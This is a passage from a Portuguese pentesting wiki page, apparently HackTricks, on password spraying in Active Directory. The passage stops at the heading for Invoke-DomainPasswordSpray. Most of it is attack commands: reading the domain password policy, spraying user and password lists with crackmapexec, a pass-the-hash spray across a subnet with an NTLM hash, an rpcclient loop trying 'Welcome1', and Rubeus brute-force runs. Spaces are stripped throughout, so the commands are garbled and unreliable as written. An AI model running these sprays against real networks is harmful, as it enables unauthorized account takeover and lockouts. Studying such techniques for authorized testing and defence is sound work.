Compartilhe seus truques de hacking enviando PRs para osHackTricks e HackTricks Cloud repositórios do github.
Password Spraying
Uma vez que você encontrou vários nomes de usuário válidos você pode tentar as senhas mais comuns (lembre-se da política de senha do ambiente) com cada um dos usuários descobertos.
Por padrão o comprimento mínimo da senha é 7.
Observe que você pode bloquear algumas contas se tentar várias senhas erradas (por padrão mais de 10).
Obter política de senha
Se você tiver algumas credenciais de usuário ou um shell como usuário de domínio você pode obter a política de senha com:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Exploração a partir do Linux (ou de qualquer sistema)
Utilizando crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Com Invoke-DomainPasswordSpray (Ele pode gerar usuários do domínio por padrão e obterá a política de senha do domínio e limitará as tentativas de acordo com ela):